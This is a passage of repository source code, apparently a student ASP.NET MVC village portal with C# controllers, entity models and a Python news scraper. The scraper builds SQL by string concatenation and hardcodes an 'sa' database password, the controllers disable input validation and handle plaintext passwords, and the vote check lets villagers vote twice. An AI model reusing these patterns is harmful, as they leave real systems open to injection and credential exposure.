(total<1)\n            {\n                return Content(\"暂无文章\");\n            }\n            List<Model.Article> list0 = dal.Article.Where(x => x.IsDeleted == true && x.Enable == true).OrderByDescending(x => x.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();//fixed: skip by pagesize, not pageindex\n            PagedList<Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n            ViewBag.Title = \"所有文章\";\n            return View(list);\n        }\n        /// <summary>\n        /// 列表新闻(添加)\n        /// </summary>\n        /// <param name=\"bh\"></param>\n        /// <param name=\"id\"></param>\n        /// <returns></returns>\n        public ActionResult AddArticle( int? id)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            #region\n            Model.UA_Category ca = dal.UA_Category.SingleOrDefault(x => x.bh == \"04\");\n            if (ca == null)\n            {\n                return Content(\"没有该分类\");\n            }\n            Model.Article art = new Model.Article();\n            #endregion//验证是否有该文章分类\n            ViewBag.Title = ca.CaName;\n            if (id == null)\n            {\n                //添加\n                art = new Model.Article()\n                {\n                    AuthorID = 999,\n                    AuthorName = \"管理员\",\n                    CaName = ca.CaName,\n                    CategoryID = ca.bh,\n                    lab = null,\n                };\n            }\n            else\n            {\n                //编辑\n                art = dal.Article.SingleOrDefault(a => a.ID == id);\n                if (art == null)\n                {\n                    return Content(\"数据库中不存在该新闻\");\n                }\n            }\n            return View(art);\n        }\n\n        [ValidateAntiForgeryToken()]\n        [HttpPost]\n        [ValidateInput(false)]\n        public ActionResult AddArticle(Model.Article art)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            if (art.ID == 0)\n            {\n                //添加\n                dal.Article.Add(new Model.Article()\n                {\n                    AuthorID = 999,\n                    Body=art.Body,\n                    Title=art.Title,\n                    CaName=art.CaName,\n                    CategoryID=art.CategoryID,\n                    AuthorName=\"管理员\",\n                    lab=art.lab,\n                    CreateTime = DateTime.Now,//assumed defaults added below, mirroring the user-side Article creation, so dates/flags are not left at default(DateTime)/false\n                    ModTime = DateTime.Now,\n                    IsDeleted = true,\n                    Enable = true\n                });\n                dal.SaveChanges();\n                return Json(new { status = \"y\", info = \"添加成功\"});\n            }\n            else\n            {\n                //编辑\n                Model.Article art_indbb = dal.Article.SingleOrDefault(a => a.ID == art.ID);\n                if (art_indbb == null)\n                {\n                    return Json(new { status = \"n\", info = \"数据库中无该新闻\" });\n                }\n                art_indbb.Title = art.Title;\n                art_indbb.Body = art.Body;\n                art_indbb.AuthorName = art.AuthorName;\n                art_indbb.AuthorID = 999;\n                art_indbb.CaName = art.CaName;\n                art_indbb.CategoryID = art.CategoryID;\n                art_indbb.lab = art.lab;\n                dal.SaveChanges();\n                return Json(new { status = \"y\", info = \"编辑成功\" });\n            }\n        }\n\n\n\n        /// <summary>\n        /// 文章审核\n        /// </summary>\n        /// <param name=\"pageindex\"></param>\n        /// <returns></returns>\n        public ActionResult ExmArticle(int pageindex = 1)\n        {\n            int pagesize = 10;//每页显示条数\n            int total = 0;//总数\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            total = dal.Article.Count(x=>x.Enable==false);\n            if (total < 1)\n            {\n                return Content(\"暂无待审核文章\");\n            }\n            List<Model.Article> list0 = dal.Article.Where(x => x.Enable == false&&x.IsDeleted==true).OrderByDescending(ad \n                => ad.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n            PagedList<GDKQ.Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n            ViewBag.Title = \"文章审核\";\n            return View(list);\n        }\n\n\n        /// <summary>\n        /// 审核通过\n        /// </summary>\n        /// <param name=\"id\"></param>\n        /// <returns></returns>\n        [HttpPost]\n        [ValidateAntiForgeryToken()]\n        public ActionResult Pass(int id)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.Article art = dal.Article.SingleOrDefault(x => x.ID==id);\n            if (art==null)\n            {\n                return Json(new { status = \"n\", info = \"数据库中没有相关数据\" });\n            }\n            art.Enable = true;\n            dal.SaveChanges();\n            return Json(new { status = \"y\", info = \"审核通过\" });\n        }\n\n        /// <summary>\n        /// 审核不通过(软删除)\n        /// </summary>\n        /// <param name=\"id\"></param>\n        /// <returns></returns>\n        [HttpPost]\n        
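// note: Delect below performs a soft delete; in this schema IsDeleted == false marks a hidden row\n        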
[ValidateAntiForgeryToken()]\n public ActionResult Delect(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n if (art == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有相关数据\" });\n }\n art.IsDeleted = false;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"删除成功\" });\n }\n\n\n }\n}" }, { "alpha_fraction": 0.5997409224510193, "alphanum_fraction": 0.606217622756958, "avg_line_length": 22.393939971923828, "blob_id": "611535a6459d4151d61905abfc4bd169ada1530e", "content_id": "ab293e36597c222362841aab5af7bda1285d80f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 772, "license_type": "no_license", "max_line_length": 55, "num_lines": 33, "path": "/GDKQ.Model/UserInfo.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"UserInfo\")]\n public partial class UserInfo\n {\n public int ID { get; set; }\n\n public int? UserID { get; set; }\n\n [StringLength(32)]\n public string Nickname { get; set; }\n\n public string Hobby { get; set; }\n\n [StringLength(8)]\n public string Gender { get; set; }\n\n public string Description { get; set; }\n\n public string Photo { get; set; }\n\n [StringLength(32)]\n public string RealName { get; set; }\n\n public virtual User User { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.6280373930931091, "alphanum_fraction": 0.6317756772041321, "avg_line_length": 22.2608699798584, "blob_id": "865b005a48e730ab766f5e825b9c10d34ac4e335", "content_id": "0d2be2e967663b55a6407841ac54c58656837aa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 535, "license_type": "no_license", "max_line_length": 55, "num_lines": 23, "path": "/GDKQ.Model/Advice.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Advice\")]\n public partial class Advice\n {\n public int ID { get; set; }\n\n public string Body { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public bool IsRead { get; set; }\n\n [StringLength(64)]\n public string From_Name { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.6679104566574097, "alphanum_fraction": 0.6679104566574097, "avg_line_length": 24.5238094329834, "blob_id": "67ce264428b17ede5d243bfb0a720a3a34e9dcec", "content_id": "a6a199ce3e680dd90fa1db083a87261061e4ed6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 536, "license_type": "no_license", "max_line_length": 57, "num_lines": 21, "path": "/GDKQ.Model/Attribute.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Attribute\")]\n public partial class Attribute\n {\n [DatabaseGenerated(DatabaseGeneratedOption.None)]\n public int ID { get; set; }\n\n public 
string Address { get; set; }\n\n public string WeChat_Subscription { get; set; }\n\n public string Email { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.571265697479248, "alphanum_fraction": 0.5781071782112122, "avg_line_length": 21.487178802490234, "blob_id": "9a99e42f0b81ade36448da917b0158de98fbe4a6", "content_id": "d7f3ecf05e9ee36dc6e7146b11919853f1bda704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 877, "license_type": "no_license", "max_line_length": 55, "num_lines": 39, "path": "/GDKQ.Model/Mail.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Mail\")]\n public partial class Mail\n {\n public int ID { get; set; }\n\n public int To_UID { get; set; }\n\n public int From_UID { get; set; }\n\n [Required]\n public string Body { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public bool IsRead { get; set; }\n\n public bool IsDelect { get; set; }\n\n [Required]\n [StringLength(64)]\n public string Title { get; set; }\n\n [Required]\n [StringLength(64)]\n public string To_Name { get; set; }\n\n [Required]\n [StringLength(64)]\n public string From_Name { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.5970436930656433, "alphanum_fraction": 0.5970436930656433, "avg_line_length": 35.1860466003418, "blob_id": "36d1e684e8b1ea6601edaa3993c0cb8cb5cba094", "content_id": "88a883959de882735a3495203118b9b8e90e7c91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1556, "license_type": "no_license", "max_line_length": 76, "num_lines": 43, "path": "/GDKQ.DAL/GDKQContext.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.DAL\n{\n using System;\n using System.Data.Entity;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Linq;\n using Model;\n\n public partial class GDKQContext : DbContext\n {\n public GDKQContext()\n : base(\"name=GDKQContext\")\n {\n }\n\n public virtual DbSet<Admin> Admin { get; set; }\n public virtual DbSet<Advice> Advice { get; set; }\n public virtual DbSet<Article> Article { get; set; }\n public virtual DbSet<Model.Attribute> Attribute { get; set; }\n public virtual DbSet<Category> Category { get; set; }\n public virtual DbSet<Comment> Comment { get; set; }\n public virtual DbSet<Mail> Mail { get; set; }\n public virtual DbSet<News> News { get; set; }\n public virtual DbSet<Photo> Photo { get; set; }\n public virtual DbSet<UA_Category> UA_Category { get; set; }\n public virtual DbSet<User> User { get; set; }\n public virtual DbSet<UserInfo> UserInfo { get; set; }\n public virtual DbSet<Villager> Villager { get; set; }\n public virtual DbSet<Vote_Main> Vote_Main { get; set; }\n public virtual DbSet<Vote_Result> Vote_Result { get; set; }\n\n protected override void OnModelCreating(DbModelBuilder modelBuilder)\n {\n modelBuilder.Entity<Photo>()\n .Property(e => e.author)\n .IsFixedLength();\n\n modelBuilder.Entity<Photo>()\n .Property(e => e.place)\n .IsFixedLength();\n }\n }\n}\n" }, { "alpha_fraction": 0.517401397228241, "alphanum_fraction": 0.547099769115448, "avg_line_length": 36.17241287231445, "blob_id": "9d16475684b7bfb7db955c4f5d9cd8e85b515a25", "content_id": "23d44ffb94727aefa1051000cc7bdeea534ea2c5", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2223, "license_type": "no_license", "max_line_length": 148, "num_lines": 58, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n public class HomeController : Controller\n {\n public class viewModel\n {\n public List<Model.News> news001 { get; set; }//公示公告\n public List<Model.News> news002 { get; set; }//建设农村\n public List<Model.News> news003 { get; set; }//村内事务\n public List<Model.News> news007 { get; set; }//时事要点\n\n public viewModel(List<Model.News> newsList001, List<Model.News> newsList002, List<Model.News> newsList003, List<Model.News> newsList007)\n {\n this.news001 = newsList001;\n this.news002 = newsList002;\n this.news003 = newsList003;\n this.news007 = newsList007;\n\n }\n }\n // 村务首页\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n var vm = new viewModel(\n dal.News.Where(x => x.bh == \"001\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(3).ToList<Model.News>(),\n dal.News.Where(x => x.bh == \"002\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(3).ToList<Model.News>(),\n dal.News.Where(x => x.bh == \"003\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(5).ToList<Model.News>(),\n dal.News.Where(x => x.bh == \"007\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(8).ToList<Model.News>()\n );\n return View(vm);\n }\n\n\n [HttpPost]\n public ActionResult AddLike(int? 
id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article a = dal.Article.SingleOrDefault(x => x.ID == id);\n if (a == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n a.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n\n\n }\n}" }, { "alpha_fraction": 0.5725893974304199, "alphanum_fraction": 0.6186348795890808, "avg_line_length": 35.19607925415039, "blob_id": "c569a1f5ab9c80ad13cbf37529c6c3499c2e8e3a", "content_id": "fbe506822ae849fa9511c8256dc21af1bf34561f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1856, "license_type": "no_license", "max_line_length": 168, "num_lines": 51, "path": "/GDKQ.Web/Content/Admin/PythonApplication/Daxuesheng.py", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "WINDOWS-1252", "text": "#coding=gbk\nimport requests\nimport pyodbc\nfrom bs4 import BeautifulSoup\nurl='http://zhannei.baidu.com/cse/search?q=%E5%AD%94%E5%9D%B5%E6%9D%91&p=0&s=10871809385446352931&entry=1'\nurl2='http://zhannei.baidu.com/cse/search?q=%E5%AD%94%E5%9D%B5%E6%9D%91&p=1&s=10871809385446352931&entry=1'\ndef fun(testurl):\n headers = {'user-agent': 'my-app/0.0.1'}\n res=requests.get(testurl,headers=headers)\n res.encoding='utf-8'\n soup=BeautifulSoup(res.text,'html.parser')\n\n cnxn =pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=GDKQ_DB;UID=sa;PWD=123456')\n cursor = cnxn.cursor()\n\n\n for i in soup.select('#results')[0].find_all(\"a\"):\n res2 = requests.get(i.get(\"href\"))\n print('ÎÄÕÂÁ´½Ó£º'+i.get(\"href\"))\n\n\n\n\n res2.encoding = 'utf-8'\n soup2 = BeautifulSoup(res2.text, 'html.parser')\n # print(soup.select('.title'))\n Title=soup2.select('.title')[0].h1.text.strip()\n ExctraMess=soup2.select('.title')[0].span.text.strip()\n \n\n\n TurlBody=''\n for j in soup2.select('.content')[0].find_all(\"p\"):\n TurlBody=TurlBody+j.text.strip()\n #print(TurlBody)\n #tempstring='insert into dbo.Py_Spider(Title, Body) values (%s,%s)'\n #tempstring.format(Title,TurlBody)\n #\n sadf=\"insert into dbo.Py_Spider(Title, Body) values (\"+\"'\"+Title+\"'\"+\",\"+\"'\"+TurlBody+\"'\"+\")\"\n #print(sadf)\n cursor.execute(sadf)\n cnxn.commit()\n #cursor.execute(\"insert into dbo.Py_Spider(Title, Body,Creattime,IsDelect,Enable,remark) values (%s,%s,%s,%s,%s,%s)\",'Title','TurlBody','null',True,True,'null')\n #cnxn.commit()\n\n #cursor.execute(\"insert into dbo.Py_Spider(Title, Body) values ('Title', 'TurlBody')\")\n #cnxn.commit()\n #print(tempstring)\n #print(i.get(\"href\"),i.text)\nfun(url)\nfun(url2)\n" }, { "alpha_fraction": 0.8157894611358643, "alphanum_fraction": 0.8157894611358643, "avg_line_length": 18, "blob_id": "6762547dd729b5fb47132d0c91da1cf22d9d23db", "content_id": "f35021521eaa14b4bb91c2c3228272a5c51d10d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 38, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/README.md", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "# BeautifulCountryside\nbase on MVC+EF\n" }, { "alpha_fraction": 0.5671392679214478, "alphanum_fraction": 0.5738115310668945, "avg_line_length": 21.62264060974121, "blob_id": "e4a6ad3443fcf1181394a1763f1d77b0375c76a9", "content_id": "6bfffb8cd683b9fef18956b68181c10279e922b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1199, "license_type": "no_license", 
"max_line_length": 55, "num_lines": 53, "path": "/GDKQ.Model/Article.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Article\")]\n public partial class Article\n {\n public int ID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string Title { get; set; }\n\n [Required]\n public string Body { get; set; }\n\n public int AuthorID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string CategoryID { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public int VisitNum { get; set; }\n\n public string Photo { get; set; }\n\n public bool IsDeleted { get; set; }\n\n public DateTime ModTime { get; set; }\n\n [Required]\n public string lab { get; set; }\n\n [Required]\n [StringLength(64)]\n public string CaName { get; set; }\n\n [StringLength(32)]\n public string AuthorName { get; set; }\n\n public int like_count { get; set; }\n\n public int Comments { get; set; }\n\n public bool Enable { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.8533333539962769, "alphanum_fraction": 0.8533333539962769, "avg_line_length": 37, "blob_id": "62688d9bb429f2e6df7332b9a8cce9842531a77f", "content_id": "afb6b725b618f89ed76cbe41111092409c0be82c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 175, "license_type": "no_license", "max_line_length": 43, "num_lines": 2, "path": "/Python爬虫文件/ReadMe.txt", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "GB18030", "text": "Daxuesheng.py 主要从大学生新闻网摘取关键词\"孔坵村\",存入论坛数据库中。\nmain.py 主要从台州政府网摘取关键词,存入村务数据库中。" }, { "alpha_fraction": 0.4976958632469177, "alphanum_fraction": 0.5069124698638916, "avg_line_length": 25.079999923706055, "blob_id": "272450cc18a647c0cc85287b3f507312b260e79b", "content_id": "f8e14995b562155458ed491843efda4578b5c199", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 653, "license_type": "no_license", "max_line_length": 88, "num_lines": 25, "path": "/GDKQ.Web/Areas/Adm1n/Adm1nAreaRegistration.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n\n{\n public class Adm1nAreaRegistration : AreaRegistration \n {\n public override string AreaName \n {\n get \n {\n return \"Adm1n\";\n }\n }\n\n public override void RegisterArea(AreaRegistrationContext context) \n {\n context.MapRoute(\n \"Adm1n_default\",\n \"Adm1n/{controller}/{action}/{id}\",\n new { controller=\"Home\", action = \"Index\", id = UrlParameter.Optional },\n new string[] { \"GDKQ.Web.Areas.Adm1n.Controllers\" }\n );\n }\n }\n}" }, { "alpha_fraction": 0.5098510384559631, "alphanum_fraction": 0.5218644738197327, "avg_line_length": 34.28813552856445, "blob_id": "f526f2e8641f1c1c9ff24730d2308669bd8ba41e", "content_id": "bf10e720ea3ddb586f6855f43e92d5130a89cc60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2109, "license_type": "no_license", "max_line_length": 158, "num_lines": 59, "path": "/GDKQ.Web/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing 
GDKQ.Model;\n\nnamespace GDKQ.Web.Controllers\n{\n public class HomeController : Controller\n {\n // GET: Home\n public ActionResult Index()\n {\n return View();\n }\n\n\n public ActionResult Home()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n List<Model.News> n = dal.News.Where(x => x.bh == \"22\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(3).ToList<Model.News>();\n List<Model.News> n1 = dal.News.Where(x => x.bh == \"411\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(2).ToList<Model.News>();\n List<Model.Article> a = dal.Article.Where(x => x.Enable == true).OrderByDescending(x => x.CreateTime).Take(11).ToList<Model.Article>();\n List<Model.News> n2 = dal.News.Where(x => x.bh == \"121\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(2).ToList<Model.News>();\n viewModel vm = new viewModel(n, n1, a, n2);\n return View(vm);\n }\n public class viewModel\n {\n public List<Article> a { get; set; }\n public List<News> n { get; set; }\n public List<News> n1 { get; set; }\n public List<News> n2 { get; set; }\n\n public viewModel(List<News> n, List<News> n1, List<Article> a, List<News> n2)\n {\n this.n = n;\n this.n1 = n1;\n this.a = a;\n this.n2 = n2;\n }\n }\n\n [HttpPost]\n public ActionResult AddLike(int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article a= dal.Article.SingleOrDefault(x => x.ID == id);\n if (a==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n a.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.4677627384662628, "alphanum_fraction": 0.4680851101875305, "avg_line_length": 30.343435287475586, "blob_id": "263b5a72e8ce508733b841fc33f022868d3a6564", "content_id": "a2d3a2f601af27c3ec301fa5f1ee04f94fb7f596", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 3230, "license_type": "no_license", "max_line_length": 93, "num_lines": 99, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/VoteController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n public class VoteController : Controller\n {\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Vote_Main vm = dal.Vote_Main.SingleOrDefault(x => x.Enabled == true);\n if (vm==null)\n {\n return Content(\"当前暂无投票\");\n }\n return View(vm);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Index(int? 
id,string Choice)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Vote_Main vm = dal.Vote_Main.SingleOrDefault(x => x.ID == id);\n if (vm==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该投票\" });\n }\n \n Model.Villager v = Session[\"villager\"] as Model.Villager;\n if (v==null)\n {\n return Json(new { status = \"n\", info = \"只有村民才能投票哦\" });\n }\n\n if (string.IsNullOrEmpty(Choice))\n {\n return Json(new { status = \"n\", info = \"请选择同意或者反对\" });\n }\n\n bool bo;\n if (Choice==\"agree\")\n {\n bo = true;\n }\n else\n {\n bo = false;\n }\n \n int total = dal.Vote_Result.Count(x => x.VoteID == id && x.VillagerID == v.ID);\n if (total>1)\n {\n return Json(new { status = \"n\", info = \"不能重复投票哦\" });\n }\n\n dal.Vote_Result.Add(new Model.Vote_Result()\n {\n Agree = bo,\n VoteID = vm.ID,\n VillagerID = v.ID,\n CreateTime = DateTime.Now\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"投票成功\" });\n }\n\n [Filter.VillagerLoginFilter]\n public ActionResult VoteResult(int?id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Vote_Main vom = dal.Vote_Main.SingleOrDefault(x => x.ID == id);\n if (vom==null)\n {\n return Content(\"没有该投票结果\");\n }\n int agree_num = dal.Vote_Result.Count(x => x.VoteID == id && x.Agree == true);\n int disagree_num= dal.Vote_Result.Count(x => x.VoteID == id && x.Agree == false);\n viewModel vm = new viewModel(vom, agree_num, disagree_num);\n return View(vm);\n }\n public class viewModel{\n public Model.Vote_Main vom { get; set; }//投票模型\n public int agree_num { get; set; }//同意数量\n public int disagree_num { get; set; }//反对数量\n\n public viewModel(Model.Vote_Main _vom, int _agree_num, int _disagree_num)\n {\n this.vom = _vom;\n this.agree_num = _agree_num;\n this.disagree_num = _disagree_num;\n }\n\n }\n }\n}" }, { "alpha_fraction": 0.5329912304878235, "alphanum_fraction": 0.5337243676185608, "avg_line_length": 29.311111450195312, "blob_id": "b7c5db4aab79dbc5e02cad44d77894470201e38a", "content_id": "d22bfefe963464916a53b05776ec9a026e9d76a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1414, "license_type": "no_license", "max_line_length": 191, "num_lines": 45, "path": "/GDKQ.Web/Areas/User/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n public class HomeController : Controller\n {\n [Filter.UserLoginFilter]\n // GET: User/Home\n public ActionResult Index()\n {\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"没有该用户的信息\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户的信息\");\n }\n List<Model.Article> art = dal.Article.Where(x => x.AuthorID == u.ID && x.Enable == true && x.IsDeleted == true).OrderByDescending(x=>x.CreateTime).Take(5).ToList<Model.Article>();\n viewModel vm = new viewModel(ui, art);\n return View(vm);\n }\n\n public class viewModel\n {\n public Model.UserInfo ui { get; set; }//用户信息\n public List<Model.Article> Article { get; set; }//个人文章\n\n public viewModel(Model.UserInfo _ui, List<Model.Article> _ArticleList)\n {\n this.ui = _ui;\n this.Article = _ArticleList;\n }\n }\n\n\n }\n}\n" }, { "alpha_fraction": 0.46425092220306396, "alphanum_fraction": 
0.46756282448768616, "avg_line_length": 31.087499618530273, "blob_id": "bbac951185dc68a180f0c74ba882689115110cd1", "content_id": "4f2271e0574e6d2fa99302b36583ff84f3b4874e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 5335, "license_type": "no_license", "max_line_length": 146, "num_lines": 160, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/RoleManageController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Common;\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n [Filter.AdminLoginFilter]\n /// <summary>\n /// 角色管理器\n /// </summary>\n public class RoleManageController : Controller\n {\n\n #region\n /// <summary>\n /// 添加村民\n /// </summary>\n /// <returns></returns>\n public ActionResult AddVillager(int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Villager v = dal.Villager.SingleOrDefault(x => x.ID == id);\n if (id == null)//添加村民\n {\n v = new Model.Villager()\n {\n CreatTime = DateTime.Now,\n Enabled = true,\n IsDeleted = true,\n LastLoginIP = GetIPadress.GetHostAddress(),\n LastLoginTime = DateTime.Now,\n };\n }\n else\n {//修改村民信息\n\n if (v == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该村民\" });\n }\n }\n return View(v);\n }\n [ValidateAntiForgeryToken()]\n [HttpPost]\n [ValidateInput(false)]\n public ActionResult AddVillager(Model.Villager v)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n if (v.ID == 0)\n {\n //添加\n dal.Villager.Add(new Model.Villager()\n {\n UserName = v.UserName,\n Password = v.Password,\n RealName = v.RealName,\n Mobile = v.Mobile,\n CreatTime=v.CreatTime,\n Enabled=v.Enabled,\n IsDeleted=v.IsDeleted,\n LastLoginIP=v.LastLoginIP,\n LastLoginTime=v.LastLoginTime\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"添加成功\" });\n }\n else\n {\n //编辑\n Model.Villager v_indbb = dal.Villager.SingleOrDefault(a => a.ID == v.ID);\n if (v_indbb == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该用户\" });\n }\n v_indbb.UserName = v.UserName;\n v_indbb.Password = v.Password;\n v_indbb.RealName = v.RealName;\n v_indbb.Mobile = v.Mobile;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"修改成功\" });\n }\n }\n\n\n /// <summary>\n /// 村民列表\n /// </summary>\n /// <returns></returns>\n public ActionResult Villager(int pageindex = 1)\n {\n int pagesize = 10;\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Villager.Count();\n List<Model.Villager> list0 = dal.Villager.OrderBy(a => a.ID).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Villager>();\n PagedList<GDKQ.Model.Villager> list = new PagedList<Model.Villager>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"村民管理\";\n return View(list);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Forbidden(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Villager v = dal.Villager.SingleOrDefault(x => x.ID == id);\n if (v == null)\n {\n return Json(new { status = 